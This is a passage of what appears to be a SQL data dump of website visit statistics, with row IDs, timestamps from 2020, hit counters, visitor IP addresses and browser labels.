1,1,0,0,'66.249.64.56','chrome'),(535757,1598452659,2,2,0,0,'66.249.70.80','chrome'),(535758,1598452821,8,8,0,0,'109.108.71.11','other'),(535759,1598453959,1,1,0,0,'91.234.27.138','chrome'),(535760,1598454287,1,1,0,0,'185.234.67.22','chrome'),(535761,1598454298,8,8,0,0,'109.108.71.11','other'),(535762,1598454581,1,1,0,0,'207.46.13.52','other'),(535763,1598454803,1,1,0,0,'157.55.39.82','other'),(535764,1598455606,1,1,0,0,'66.249.64.58','chrome'),(535765,1598455668,1,1,0,0,'157.55.39.88','other'),(535766,1598455737,8,8,0,0,'109.108.71.11','other'),(535767,1598456560,1,1,0,0,'157.55.39.82','other'),(535768,1598456770,1,1,0,0,'66.249.70.78','chrome'),(535769,1598456877,1,1,0,0,'8.29.198.26','other'),(535770,1598457178,8,8,0,0,'109.108.71.11','other'),(535771,1598458108,1,1,0,0,'17.58.99.7','other'),(535772,1598458295,1,1,0,0,'157.55.39.88','other'),(535773,1598517059,2,2,0,0,'91.196.178.5','chrome'),(535774,1598518247,2,2,0,0,'91.196.178.5','chrome'),(535775,1598519044,2,2,0,0,'91.196.178.86','chrome'),(535776,1598519155,1,1,0,0,'91.196.178.5','chrome'),(535777,1598520176,1,1,0,0,'91.196.178.86','chrome'),(535778,1598521646,1,1,0,0,'91.196.178.86','chrome'),(535779,1598523553,2,2,0,0,'91.196.178.5','chrome'),(535780,1598527757,2,2,0,0,'91.196.178.5','chrome'),(535781,1598530439,1,1,0,0,'91.196.178.86','chrome'),(535782,1598531474,1,1,0,0,'91.196.178.86','chrome'),(535783,1598532518,1,1,0,0,'91.196.178.86','chrome'),(535784,1598533509,1,1,0,0,'91.196.178.86','chrome'),(535785,1598534528,1,1,0,0,'91.196.178.86','chrome'),(535786,1598536108,1,1,0,0,'91.196.178.86','chrome'),(535787,1598546153,1,1,0,0,'91.196.178.5','chrome'),(535788,1598551120,1,1,0,0,'91.196.178.5','chrome'),(535789,1598555629,1,1,0,0,'91.196.178.5','chrome'),(535790,1598559635,1,1,0,0,'91.196.178.5','chrome'),(535791,1598560651,1,1,0,0,'91.196.178.5','chrome'),(535792,1598561638,2,2,0,0,'91.196.178.5','chrome'),(535793,1598586116,1,1,0,0,'91.196.178.5','chrome'),(535794,1598592650,1,1,0,0,'91.196.178.72','chrome'),(535795,1598594503,1,1,0,0,'91.196.178.72','chrome'),(535796,1598601420,1,1,0,0,'91.196.178.72','chrome'),(535797,1598605901,1,1,0,0,'91.196.178.72','chrome'),(535798,1598606941,1,1,0,0,'91.196.178.72','chrome'),(535799,1598607862,1,1,0,0,'91.196.178.72','chrome'),(535800,1598608775,1,1,0,0,'91.196.178.72','chrome'),(535801,1598610145,1,1,0,0,'91.196.178.5','chrome'),(535802,1598613830,1,1,0,0,'91.196.178.5','chrome'),(535803,1598614428,1,1,0,0,'91.196.178.72','chrome'),(535804,1598615368,1,1,0,0,'91.196.178.72','chrome'),(535805,1598616301,1,1,0,0,'91.196.178.72','chrome'),(535806,1598623711,1,1,0,0,'91.196.178.5','other'),(535807,1598625456,1,1,0,0,'91.196.178.5','chrome'),(535808,1598628640,3,3,0,0,'91.196.178.5','chrome'),(535809,1598630625,1,1,0,0,'91.196.178.5','chrome'),(535810,1598631530,1,1,0,0,'91.196.178.5','chrome'),(535811,1598633200,1,1,0,0,'91.196.178.5','chrome'),(535812,1598634645,1,1,0,0,'91.196.178.5','chrome'),(535813,1598635630,3,3,0,0,'91.196.178.5','chrome'),(535814,1598636532,1,1,0,0,'91.196.178.5','chrome'),(535815,1598637455,1,1,0,0,'91.196.178.5','chrome'),(535816,1598638757,1,1,0,0,'91.196.178.5','chrome'),(535817,1598639668,1,1,0,0,'91.196.178.5','chrome'),(535818,1598641864,1,1,0,0,'91.196.178.5','chrome'),(535819,1598643582,1,1,0,0,'91.196.178.5','other'),(535820,1598672601,1,1,0,0,'91.196.178.5','chrome'),(535821,1598680511,1,1,0,0,'91.196.178.5','chrome'),(535822,1598681858,3,3,0,0,'91.196.178.5','chrome'),(535823,1598684226,2,2,0,0,'91.196.178.5','chrome'),(535824,1598702249,3,3,0,0,'91.196.178.5','chrome'),(535825,1598703827,2,2,0,0,'91.196.178.5','chrome'),(535826,1598705020,2,2,0,0,'91.196.178.5','chrome'),(535827,1598707721,1,1,0,0,'91.196.178.5','chrome'),(535828,1598718593,2,2,0,0,'91.196.178.18','chrome'),(535829,1598720653,1,1,0,0,'91.196.178.18','chrome'),(535830,1598722172,1,1,0,0,'91.196.178.18','chrome'),(535831,1598722183,3,3,0,0,'66.249.93.124','other'),(535832,1598722184,1,1,0,0,'66.249.93.120','other'),(535835,1598722233,1,1,0,0,'66.249.93.122','other'),(535836,1598726665,1,1,0,0,'66.249.93.118','chrome'),(535837,1598726666,1,1,0,0,'66.249.93.120','chrome'),(535838,1598726808,1,1,0,0,'91.196.178.18','chrome'),(535839,1598728050,1,1,0,0,'91.196.178.18','chrome'),(535840,1598728956,1,1,0,0,'91.196.178.18','chrome'),(535841,1598729917,1,1,0,0,'91.196.178.18','chrome'),(535842,1598731114,1,1,0,0,'109.70.106.130','other'),(535843,1598731452,2,2,0,0,'91.196.178.18','chrome'),(535844,1598733805,4,4,0,0,'109.70.111.112','chrome'),(535845,1598760583,1,1,0,0,'91.196.178.18','chrome'),(535846,1598767465,1,1,0,0,'91.196.178.18','chrome'),(535847,1598768555,1,1,0,0,'91.196.178.18','chrome'),(535848,1598779323,1,1,0,0,'91.196.178.18','chrome'),(535849,1598780250,3,3,0,0,'91.196.178.18','chrome'),(535850,1598782504,1,1,0,0,'91.196.178.18','chrome'),(535851,1598783534,1,1,0,0,'91.196.178.18','chrome'),(535852,1598784473,1,1,0,0,'91.196.178.18','chrome'),(535853,1598785423,2,2,0,0,'91.196.178.18','chrome'),(535854,1598786621,1,1,0,0,'91.196.178.18','chrome'),(535855,1598787690,3,3,0,0,'91.196.178.18','chrome'),(535856,1598788998,1,1,0,0,'91.196.178.18','chrome'),(535857,1598796670,1,1,0,0,'91.196.178.18','chrome'),(535858,1598797675,1,1,0,0,'91.196.178.18','chrome'),(535859,1598798581,1,1,0,0,'91.196.178.18','chrome'),(535860,1598799585,1,1,0,0,'91.196.178.18','chrome'),(535861,1598801604,1,1,0,0,'91.196.178.18','chrome'),(535862,1598802608,1,1,0,0,'91.196.178.18','chrome'),(535863,1598803526,7,7,0,0,'91.196.178.18','chrome'),(535864,1598803743,1,1,0,0,'91.196.178.18','other'),(535865,1598804438,1,1,0,0,'91.196.178.18','chrome'),(535866,1598805535,2,2,0,0,'91.196.178.18','chrome'),(535867,1598806456,2,2,0,0,'91.196.178.18','chrome'),(535868,1598807361,1,1,0,0,'91.196.178.18','chrome'),(535869,1598808262,1,1,0,0,'91.196.178.18','chrome'),(535870,1598810580,1,1,0,0,'91.196.178.18','chrome'),(535871,1598811341,1,1,0,0,'173.252.111.120','other'),(535872,1598811343,1,1,0,0,'31.13.103.117','other'),(535873,1598811344,1,1,0,0,'173.252.111.112','other'),(535874,1598811346,1,1,0,0,'173.252.111.118','other'),(535875,1598811529,1,1,0,0,'91.196.178.18','chrome'),(535876,1598815479,2,2,0,0,'91.196.178.18','chrome'),(535877,1598815541,1,1,0,0,'185.234.67.0','chrome'),(535878,1598816684,1,1,0,0,'91.196.178.18','chrome'),(535879,1598844644,2,2,0,0,'91.196.178.18','chrome'),(535880,1598852011,3,3,0,0,'91.196.178.81','chrome'),(535881,1598855824,2,2,0,0,'91.196.178.81','chrome'),(535882,1598856742,1,1,0,0,'91.196.178.81','chrome'),(535883,1598860411,1,1,0,0,'91.196.178.81','chrome'),(535884,1598861380,1,1,0,0,'91.196.178.81','chrome'),(535885,1598861411,1,1,0,0,'31.13.127.16','other'),(535886,1598861412,1,1,0,0,'31.13.127.15','other'),(535887,1598861571,2,2,0,0,'31.13.127.17','other'),(535888,1598861572,1,1,0,0,'31.13.127.1','other'),(535890,1598861574,1,1,0,0,'31.13.127.10','other'),(535891,1598861578,1,1,0,0,'31.13.127.4','other'),(535892,1598861583,1,1,0,0,'31.13.127.120','other'),(535893,1598861584,1,1,0,0,'31.13.127.19','other'),(535895,1598861952,1,1,0,0,'46.211.10.67','chrome'),(535896,1598862153,1,1,0,0,'188.190.172.107','other'),(535897,1598862335,1,1,0,0,'31.13.127.16','other'),(535898,1598862389,1,1,0,0,'94.254.168.5','chrome'),(535899,1598862533,1,1,0,0,'91.196.178.81','chrome'),(535900,1598862813,2,2,0,0,'86.145.178.195','other'),(535901,1598863638,1,1,0,0,'95.132.3.108','chrome'),(535902,1598864360,1,1,0,0,'194.44.17.114','chrome'),(535903,1598865094,2,2,0,0,'66.249.93.120','chrome'),(535904,1598865191,1,1,0,0,'173.252.127.117','other'),(535905,1598865223,1,1,0,0,'91.196.178.81','chrome'),(535906,1598865382,1,0,1,0,'66.249.66.43',''),(535907,1598865775,1,1,0,0,'31.13.127.18','other'),(535908,1598865776,1,1,0,0,'31.13.127.8','other'),(535909,1598865778,1,1,0,0,'31.13.127.15','other'),(535910,1598865870,1,1,0,0,'31.13.127.1','other'),(535911,1598865872,1,1,0,0,'31.13.127.24','other'),(535912,1598866239,1,1,0,0,'91.196.178.81','chrome'),(535913,1598866268,1,1,0,0,'40.77.188.238','other'),(535914,1598866348,1,1,0,0,'65.55.210.9','other'),(535915,1598868584,1,1,0,0,'94.153.29.13','chrome'),(535916,1598869058,1,1,0,0,'46.211.57.74','other'),(535917,1598869240,1,1,0,0,'92.112.108.230','chrome'),(535918,1598869255,1,1,0,0,'94.153.80.81','chrome'),(535919,1598869366,1,1,0,0,'66.220.149.26','other'),(535920,1598869638,1,1,0,0,'193.164.94.174','chrome'),(535921,1598870076,1,1,0,0,'173.252.83.120','other'),(535922,1598870288,1,1,0,0,'185.228.76.101','chrome'),(535923,1598870859,1,1,0,0,'91.196.178.18','other'),(535924,1598874616,1,1,0,0,'91.196.178.81','chrome'),(535925,1598875058,1,1,0,0,'18.202.86.26','other'),(535926,1598875060,1,1,0,0,'54.73.92.82','other'),(535927,1598875130,1,1,0,0,'52.212.0.178','other'),(535928,1598876401,1,1,0,0,'69.171.251.12','other'),(535929,1598877527,1,1,0,0,'46.211.66.189','chrome'),(535930,1598879894,1,1,0,0,'91.196.178.81','chrome'),(535931,1598880063,1,1,0,0,'31.13.127.111','other'),(535932,1598880064,1,1,0,0,'31.13.127.112','other'),(535933,1598880065,1,1,0,0,'31.13.127.12','other'),(535934,1598880066,1,1,0,0,'31.13.127.9','other'),(535935,1598880067,1,1,0,0,'31.13.127.22','other'),(535936,1598880069,1,1,0,0,'31.13.127.18','other'),(535937,1598880112,2,2,0,0,'31.13.127.4','other'),(535938,1598881298,1,1,0,0,'91.196.178.81','chrome'),(535939,1598882710,1,1,0,0,'46.113.159.94','chrome'),(535940,1598883127,1,1,0,0,'31.13.127.9','other'),(535941,1598884937,1,1,0,0,'31.13.127.118','other'),(535942,1598885612,1,1,0,0,'91.196.178.18','chrome'),(535943,1598885750,1,1,0,0,'93.170.97.232','chrome'),(535944,1598886199,1,1,0,0,'94.153.14.82','chrome'),(535945,1598887141,1,1,0,0,'69.171.251.5','other'),(535946,1598887658,1,1,0,0,'94.153.20.178','chrome'),(535947,1598887912,1,1,0,0,'66.220.149.12','other'),(535948,1598888953,1,1,0,0,'91.225.232.225','other'),(535949,1598889980,1,1,0,0,'66.220.149.23','other'),(535950,1598890143,2,2,0,0,'5.173.168.139','chrome'),(535951,1598890279,1,1,0,0,'91.196.178.164','other'),(535952,1598890641,1,1,0,0,'91.196.178.18','chrome'),(535953,1598891952,1,1,0,0,'173.252.127.9','other'),(535954,1598892748,1,1,0,0,'66.249.83.44','other'),(535955,1598892751,2,2,0,0,'66.249.83.42','other'),(535956,1598892781,1,1,0,0,'66.249.66.47','chrome'),(535957,1598893019,2,2,0,0,'91.196.178.18','chrome'),(535958,1598893358,3,3,0,0,'66.249.66.43','chrome'),(535959,1598893760,1,1,0,0,'193.239.75.78','chrome'),(535960,1598893999,1,1,0,0,'91.196.178.18','chrome'),(535961,1598894155,1,1,0,0,'66.249.83.42','other'),(535962,1598894157,1,1,0,0,'66.249.83.44','other'),(535963,1598894158,1,1,0,0,'66.249.83.46','other'),(535964,1598894177,1,1,0,0,'66.249.66.45','chrome'),(535965,1598896355,3,3,0,0,'91.196.178.18','chrome'),(535966,1598896671,2,2,0,0,'66.220.149.19','other'),(535967,1598897407,1,1,0,0,'91.196.178.18','chrome'),(535968,1598897491,2,2,0,0,'173.252.111.112','other'),(535969,1598897493,3,3,0,0,'173.252.111.2','other'),(535971,1598897495,1,1,0,0,'173.252.87.17','other'),(535972,1598897497,1,1,0,0,'173.252.111.22','other'),(535973,1598897502,1,1,0,0,'173.252.111.20','other'),(535974,1598897508,1,1,0,0,'173.252.111.21','other'),(535975,1598897509,1,1,0,0,'173.252.111.117','other'),(535976,1598897511,1,1,0,0,'5.173.252.84','chrome'),(535977,1598897512,1,1,0,0,'185.228.76.101','chrome'),(535978,1598897549,1,1,0,0,'193.164.94.247','chrome'),(535979,1598897613,1,1,0,0,'91.195.157.94','chrome'),(535980,1598897848,1,1,0,0,'173.252.127.19','other'),(535981,1598898074,1,1,0,0,'91.226.254.96','chrome'),(535982,1598898165,1,1,0,0,'173.252.79.9','other'),(535984,1598898167,1,1,0,0,'173.252.83.1','other'),(535985,1598898522,1,1,0,0,'185.138.231.194','chrome'),(535986,1598898830,1,1,0,0,'193.246.149.138','chrome'),(535987,1598899374,1,1,0,0,'95.46.6.139','chrome'),(535988,1598899508,1,1,0,0,'91.196.178.18','chrome'),(535989,1598899688,1,1,0,0,'94.153.8.215','chrome'),(535990,1598899913,1,1,0,0,'94.153.33.42','chrome'),(535991,1598899985,1,1,0,0,'195.200.64.73','other'),(535992,1598900177,1,1,0,0,'31.41.90.252','chrome'),(535993,1598900496,1,1,0,0,'62.122.67.22','chrome'),(535994,1598900542,2,2,0,0,'91.196.178.18','chrome'),(535995,1598900839,1,1,0,0,'91.220.61.241','chrome'),(535996,1598901306,1,1,0,0,'195.16.79.149','chrome'),(535997,1598901552,1,1,0,0,'176.118.53.193','chrome'),(535998,1598902017,1,1,0,0,'69.171.251.15','other'),(535999,1598902140,1,1,0,0,'193.164.94.174','chrome'),(536000,1598902145,1,1,0,0,'46.211.64.129','chrome'),(536001,1598902178,1,1,0,0,'5.58.146.195','chrome'),(536002,1598902250,1,1,0,0,'69.171.251.28','other'),(536003,1598902596,2,2,0,0,'91.193.167.156','chrome'),(536004,1598902668,1,1,0,0,'91.245.101.160','chrome'),(536005,1598902791,1,1,0,0,'91.224.201.130','other'),(536006,1598902807,1,1,0,0,'195.88.138.83','chrome'),(536007,1598902891,1,1,0,0,'94.114.146.20','chrome'),(536008,1598902930,1,1,0,0,'92.253.204.40','chrome'),(536009,1598902956,1,1,0,0,'94.153.18.240','chrome'),(536010,1598902997,1,1,0,0,'78.154.184.200','chrome'),(536011,1598903193,1,1,0,0,'37.73.215.230','chrome'),(536012,1598903310,1,1,0,0,'95.134.0.124','chrome'),(536013,1598903524,1,1,0,0,'37.109.33.178','chrome'),(536014,1598903571,1,1,0,0,'94.153.20.229','chrome'),(536015,1598903595,1,1,0,0,'46.211.2.255','chrome'),(536016,1598904181,1,1,0,0,'91.207.245.154','chrome'),(536017,1598904704,1,1,0,0,'91.196.178.18','chrome'),(536018,1598904782,1,1,0,0,'173.252.111.22','other'),(536019,1598904939,1,1,0,0,'37.221.131.199','chrome'),(536020,1598905075,1,1,0,0,'37.73.204.147','chrome'),(536021,1598905684,1,1,0,0,'188.163.120.119','chrome'),(536022,1598906130,1,1,0,0,'69.171.251.21','other'),(536023,1598906223,1,1,0,0,'173.252.79.112','other'),(536024,1598906367,1,1,0,0,'176.125.52.205','chrome'),(536025,1598906763,1,1,0,0,'194.44.50.160','chrome'),(536026,1598907484,1,1,0,0,'173.252.111.11','other'),(536027,1598907806,1,1,0,0,'173.252.87.21','other'),(536028,1598907860,1,1,0,0,'173.252.127.119','other'),(536029,1598909797,1,1,0,0,'173.252.111.16','other'),(536030,1598910693,1,1,0,0,'78.154.184.204','chrome'),(536031,1598911354,1,1,0,0,'66.220.149.18','other'),(536032,1598911367,1,1,0,0,'193.238.23.227','chrome'),(536033,1598911400,1,1,0,0,'173.252.87.117','other'),(536034,1598913189,1,1,0,0,'66.220.149.8','other'),(536035,1598913777,1,1,0,0,'173.252.83.15','other'),(536036,1598918202,1,1,0,0,'173.252.127.17','other'),(536037,1598918608,1,1,0,0,'69.171.251.35','other'),(536038,1598921797,1,1,0,0,'173.252.79.11','other'),(536039,1598922807,1,1,0,0,'172.58.38.129','chrome'),(536040,1598923341,1,1,0,0,'173.252.111.113','other'),(536041,1598923397,1,1,0,0,'46.211.20.192','chrome'),(536042,1598923880,1,1,0,0,'94.231.183.48','chrome'),(536043,1598929988,1,1,0,0,'91.196.178.18','chrome'),(536044,1598933092,1,1,0,0,'194.44.41.129','chrome'),(536045,1598934756,1,1,0,0,'66.220.149.18','other'),(536046,1598935029,1,1,0,0,'31.40.18.125','chrome'),(536047,1598935844,1,1,0,0,'46.211.77.238','chrome'),(536048,1598936344,1,1,0,0,'195.135.247.25','chrome'),(536049,1598936974,1,1,0,0,'46.211.38.166','chrome'),(536050,1598938035,1,1,0,0,'91.196.178.81','chrome'),(536051,1598938076,1,1,0,0,'5.58.190.137','chrome'),(536052,1598938104,1,1,0,0,'46.211.48.58','chrome'),(536053,1598939283,1,1,0,0,'91.196.178.81','chrome'),(536054,1598939318,2,2,0,0,'31.13.127.1','other'),(536055,1598939320,2,2,0,0,'31.13.127.118','other'),(536056,1598939326,1,1,0,0,'31.13.127.8','other'),(536057,1598939327,1,1,0,0,'31.13.127.5','other'),(536058,1598939503,1,1,0,0,'74.208.169.168','firefox'),(536059,1598939504,1,1,0,0,'209.208.97.172','firefox'),(536060,1598939644,1,1,0,0,'173.252.87.1','other'),(536061,1598939765,1,1,0,0,'31.13.127.24','other'),(536062,1598940049,1,1,0,0,'81.162.247.151','firefox'),(536063,1598941022,1,1,0,0,'46.211.26.72','chrome'),(536064,1598942371,1,1,0,0,'176.121.5.134','chrome'),(536065,1598942718,1,1,0,0,'94.153.15.110','chrome'),(536066,1598943007,1,1,0,0,'176.118.43.241','chrome'),(536067,1598943012,1,1,0,0,'69.171.251.13','other'),(536068,1598943332,1,1,0,0,'83.137.6.249','chrome'),(536069,1598943388,1,1,0,0,'173.252.87.118','other'),(536070,1598943858,1,1,0,0,'94.153.25.255','chrome'),(536071,1598944299,1,1,0,0,'69.171.251.2','other'),(536072,1598945057,1,1,0,0,'193.93.218.174','chrome'),(536073,1598946698,1,1,0,0,'173.252.83.120','other'),(536074,1598946838,1,1,0,0,'5.173.234.190','other'),(536075,1598946894,1,1,0,0,'37.73.0.3','chrome'),(536076,1598947832,1,1,0,0,'82.145.208.65','other'),(536077,1598948009,1,1,0,0,'31.13.127.19','other'),(536078,1598949768,1,0,1,0,'66.249.66.43',''),(536079,1598949911,1,1,0,0,'91.196.178.81','chrome'),(536080,1598950579,1,1,0,0,'46.211.41.206','chrome'),(536081,1598952026,1,1,0,0,'66.220.149.21','other'),(536082,1598953174,1,1,0,0,'46.211.21.237','chrome'),(536083,1598953910,1,1,0,0,'46.211.41.208','chrome'),(536084,1598955317,1,1,0,0,'46.211.69.79','chrome'),(536085,1598955940,1,1,0,0,'178.133.188.139','chrome'),(536086,1598956727,1,1,0,0,'173.252.107.16','other'),(536087,1598957231,1,1,0,0,'31.13.127.113','other'),(536088,1598957288,1,1,0,0,'93.170.97.61','chrome'),(536089,1598957621,1,1,0,0,'69.171.251.10','other'),(536090,1598959894,1,1,0,0,'94.153.77.126','chrome'),(536091,1598960328,1,1,0,0,'91.196.178.81','chrome'),(536092,1598960372,1,1,0,0,'173.252.127.116','other'),(536093,1598960519,1,1,0,0,'178.246.49.218','chrome'),(536094,1598961525,1,1,0,0,'46.211.22.229','other'),(536095,1598962931,1,1,0,0,'173.252.127.5','other'),(536096,1598964209,3,3,0,0,'91.196.178.81','chrome'),(536097,1598965419,1,1,0,0,'66.220.149.3','other'),(536098,1598968506,2,2,0,0,'173.252.83.8','other'),(536099,1598968507,1,1,0,0,'173.252.83.6','other'),(536100,1598970086,1,1,0,0,'95.132.133.178','chrome'),(536101,1598970896,1,1,0,0,'173.252.111.21','other'),(536102,1598970994,1,1,0,0,'91.236.138.84','chrome'),(536103,1598972249,1,1,0,0,'31.13.127.7','other'),(536104,1598972586,1,1,0,0,'94.231.182.34','chrome'),(536105,1598973385,1,1,0,0,'46.16.122.178','chrome'),(536106,1598973913,1,1,0,0,'173.252.83.11','other'),(536107,1598974064,1,1,0,0,'173.252.95.14','other'),(536108,1598975574,1,1,0,0,'62.122.206.130','chrome'),(536109,1598976578,1,1,0,0,'188.191.66.69','chrome'),(536110,1598977060,1,1,0,0,'94.153.13.140','chrome'),(536111,1598978893,1,1,0,0,'94.231.182.41','chrome'),(536112,1598979445,1,1,0,0,'95.46.104.139','other'),(536113,1598979471,1,1,0,0,'31.175.250.240','chrome'),(536114,1598979550,1,1,0,0,'173.252.95.20','other'),(536115,1598979954,1,1,0,0,'173.252.83.12','other'),(536116,1598980486,1,1,0,0,'46.135.42.202','chrome'),(536117,1598981126,1,1,0,0,'91.246.66.199','chrome'),(536118,1598981463,1,1,0,0,'173.252.87.113','other'),(536119,1598982545,1,1,0,0,'173.252.111.119','other'),(536120,1598982601,1,1,0,0,'91.196.178.18','chrome'),(536121,1598985299,1,1,0,0,'31.13.115.16','other'),(536122,1598985515,1,1,0,0,'37.47.244.157','chrome'),(536123,1598986570,1,1,0,0,'91.224.179.39','chrome'),(536124,1598986812,1,1,0,0,'178.94.247.119','chrome'),(536125,1598987232,1,1,0,0,'173.252.95.119','other'),(536126,1598988394,1,1,0,0,'128.124.20.125','chrome'),(536127,1598988801,1,1,0,0,'176.121.5.5','chrome'),(536128,1598988992,1,1,0,0,'178.94.247.119','chrome'),(536129,1598989215,1,1,0,0,'69.171.251.23','other'),(536130,1598989704,1,1,0,0,'94.231.79.121','chrome'),(536131,1598992604,1,1,0,0,'31.13.127.11','other'),(536132,1598995220,1,1,0,0,'173.252.127.7','other'),(536133,1598995972,1,1,0,0,'69.171.251.31','other'),(536134,1598996593,1,1,0,0,'95.117.89.14','other'),(536135,1598997365,1,1,0,0,'46.211.45.39','chrome'),(536136,1598998783,1,1,0,0,'173.252.127.29','other'),(536137,1598998978,1,1,0,0,'46.133.68.223','chrome'),(536138,1599004524,1,1,0,0,'31.13.115.16','chrome'),(536139,1599004527,1,1,0,0,'31.13.115.119','chrome'),(536140,1599004537,1,1,0,0,'31.13.115.2','chrome'),(536141,1599004538,1,1,0,0,'31.13.115.18','chrome'),(536142,1599010607,1,1,0,0,'173.252.111.21','other'),(536143,1599016018,1,1,0,0,'173.252.83.116','other'),(536144,1599018117,1,1,0,0,'91.196.178.18','chrome'),(536145,1599022944,1,1,0,0,'194.44.221.30','other'),(536146,1599025807,1,1,0,0,'31.13.103.23','other'),(536147,1599025814,1,1,0,0,'31.13.115.18','other'),(536148,1599026529,1,1,0,0,'91.196.178.81','chrome'),(536149,1599027171,1,1,0,0,'31.13.127.22','other'),(536150,1599027285,1,1,0,0,'95.47.251.63','chrome'),(536151,1599028884,1,1,0,0,'91.196.178.81','chrome'),(536152,1599029799,1,1,0,0,'91.196.178.81','chrome'),(536153,1599030701,1,1,0,0,'91.196.178.81','chrome'),(536154,1599031691,1,1,0,0,'91.196.178.81','chrome'),(536155,1599033955,1,1,0,0,'188.191.66.190','chrome'),(536156,1599034682,1,1,0,0,'31.13.115.116','other'),(536157,1599034952,1,1,0,0,'176.120.99.202','chrome'),(536158,1599035152,1,1,0,0,'173.252.79.20','other'),(536159,1599036232,1,1,0,0,'66.220.149.6','other'),(536160,1599037073,1,1,0,0,'46.133.81.71','chrome'),(536161,1599038611,1,1,0,0,'46.211.81.97','chrome'),(536162,1599038900,1,1,0,0,'94.153.75.218','chrome'),(536163,1599044842,1,1,0,0,'173.252.87.118','other'),(536165,1599044843,1,1,0,0,'173.252.87.10','other'),(536166,1599045082,1,0,1,0,'66.249.66.47',''),(536167,1599046898,1,1,0,0,'91.196.178.81','chrome'),(536168,1599048077,1,1,0,0,'91.196.178.81','chrome'),(536169,1599049535,1,1,0,0,'91.196.178.81','chrome'),(536170,1599050436,1,1,0,0,'91.196.178.81','chrome'),(536171,1599051719,1,1,0,0,'173.252.87.116','other'),(536172,1599052247,1,1,0,0,'91.196.178.81','chrome'),(536173,1599053159,2,1,0,1,'91.196.178.81','chrome'),(536174,1599053882,1,1,0,0,'31.13.127.120','other'),(536175,1599058886,1,1,0,0,'31.13.127.20','other'),(536176,1599058946,1,1,0,0,'176.121.8.53','chrome'),(536177,1599059398,1,1,0,0,'173.252.95.34','other'),(536178,1599065320,1,1,0,0,'173.252.83.19','other'),(536179,1599065622,1,1,0,0,'91.196.178.5','chrome'),(536180,1599069011,1,1,0,0,'31.13.127.118','other'),(536181,1599070273,1,1,0,0,'178.94.196.101','chrome'),(536182,1599070345,1,1,0,0,'193.34.173.178','chrome'),(536183,1599073497,1,1,0,0,'194.44.36.146','chrome'),(536184,1599074065,1,1,0,0,'188.146.49.255','chrome'),(536185,1599074470,1,1,0,0,'77.121.125.85','chrome'),(536186,1599077895,1,1,0,0,'173.252.111.24','other'),(536187,1599080540,2,2,0,0,'31.43.163.193','chrome'),(536188,1599080546,1,1,0,0,'200.195.155.199','chrome'),(536189,1599080668,1,1,0,0,'173.252.95.36','other'),(536190,1599081959,1,1,0,0,'46.45.185.189','chrome'),(536191,1599096672,1,1,0,0,'72.137.84.61','chrome'),(536192,1599096674,1,1,0,0,'31.13.127.14','other'),(536193,1599099036,1,1,0,0,'31.13.115.1','other'),(536194,1599103783,1,1,0,0,'109.53.13.180','chrome'),(536195,1599112002,1,1,0,0,'31.13.127.15','other'),(536196,1599112320,1,1,0,0,'31.13.127.111','other'),(536197,1599112799,1,1,0,0,'91.196.178.5','chrome'),(536198,1599113946,1,1,0,0,'91.196.178.81','chrome'),(536199,1599114077,1,1,0,0,'31.13.127.14','other'),(536200,1599114834,1,1,0,0,'69.171.251.16','other'),(536201,1599116509,1,1,0,0,'91.196.178.81','chrome'),(536202,1599117539,1,1,0,0,'91.196.178.81','chrome'),(536203,1599117638,1,1,0,0,'66.249.83.46','other'),(536204,1599117640,1,1,0,0,'66.249.83.42','other'),(536205,1599117641,1,1,0,0,'66.249.83.44','other'),(536206,1599117659,1,1,0,0,'66.249.70.15','chrome'),(536207,1599118927,1,0,1,0,'66.249.70.15',''),(536208,1599119656,1,1,0,0,'91.196.178.81','chrome'),(536209,1599121467,1,1,0,0,'31.13.127.16','other'),(536210,1599121507,1,1,0,0,'66.220.149.17','other'),(536211,1599132619,1,1,0,0,'91.196.178.81','chrome'),(536212,1599133635,1,1,0,0,'66.220.149.6','other'),(536213,1599133640,1,1,0,0,'66.220.149.24','other'),(536214,1599133641,1,1,0,0,'66.220.149.21','other'),(536215,1599140976,2,2,0,0,'91.196.178.81','chrome'),(536216,1599141362,1,1,0,0,'31.13.127.118','other'),(536217,1599146594,1,1,0,0,'31.13.115.8','chrome'),(536218,1599146598,1,1,0,0,'31.13.115.119','chrome'),(536219,1599146782,1,1,0,0,'83.148.98.195','chrome'),(536220,1599151580,2,2,0,0,'91.196.178.5','chrome'),(536221,1599152489,3,3,0,0,'91.196.178.5','chrome'),(536222,1599153406,1,1,0,0,'91.196.178.5','chrome'),(536223,1599154360,1,1,0,0,'91.196.178.5','chrome'),(536224,1599154918,1,1,0,0,'195.43.71.218','chrome'),(536225,1599155390,1,1,0,0,'91.196.178.5','chrome'),(536226,1599155671,1,1,0,0,'173.252.111.119','other'),(536227,1599156301,1,1,0,0,'91.196.178.5','chrome'),(536228,1599157114,1,1,0,0,'151.251.243.244','chrome'),(536229,1599157499,1,1,0,0,'173.252.111.5','other'),(536230,1599157528,1,1,0,0,'173.252.111.17','other'),(536231,1599158708,1,1,0,0,'91.196.178.5','chrome'),(536232,1599159706,1,1,0,0,'91.196.178.5','chrome'),(536233,1599159717,1,1,0,0,'173.252.111.18','other'),(536234,1599159719,1,1,0,0,'173.252.95.2','other'),(536235,1599159720,1,1,0,0,'173.252.111.22','other'),(536236,1599159721,1,1,0,0,'173.252.111.112','other'),(536237,1599159723,1,1,0,0,'173.252.111.11','other'),(536238,1599159728,1,1,0,0,'173.252.111.117','other'),(536240,1599159754,1,1,0,0,'92.40.168.185','other'),(536241,1599159855,1,1,0,0,'193.56.148.57','chrome'),(536242,1599160022,1,1,0,0,'95.46.6.143','chrome'),(536243,1599160075,1,1,0,0,'46.211.1.82','chrome'),(536244,1599160114,1,1,0,0,'46.63.121.200','chrome'),(536245,1599160118,1,1,0,0,'194.44.36.50','chrome'),(536246,1599160300,1,1,0,0,'95.134.98.56','chrome'),(536247,1599160334,1,1,0,0,'91.207.245.154','chrome'),(536248,1599160359,1,1,0,0,'37.248.152.136','chrome'),(536249,1599160458,1,1,0,0,'176.121.6.66','chrome'),(536250,1599160537,1,1,0,0,'62.122.206.130','chrome'),(536251,1599160657,1,1,0,0,'5.173.24.237','chrome'),(536252,1599160853,1,1,0,0,'46.133.184.2','chrome'),(536253,1599161065,1,1,0,0,'93.170.117.27','chrome'),(536254,1599161069,1,1,0,0,'46.211.11.14','chrome'),(536255,1599161199,1,1,0,0,'37.55.61.244','chrome'),(536256,1599161529,1,1,0,0,'82.129.135.100','chrome'),(536257,1599161619,1,1,0,0,'46.211.63.190','chrome'),(536258,1599161645,1,1,0,0,'173.252.111.19','other'),(536259,1599161788,1,1,0,0,'188.163.77.186','chrome'),(536260,1599161941,1,1,0,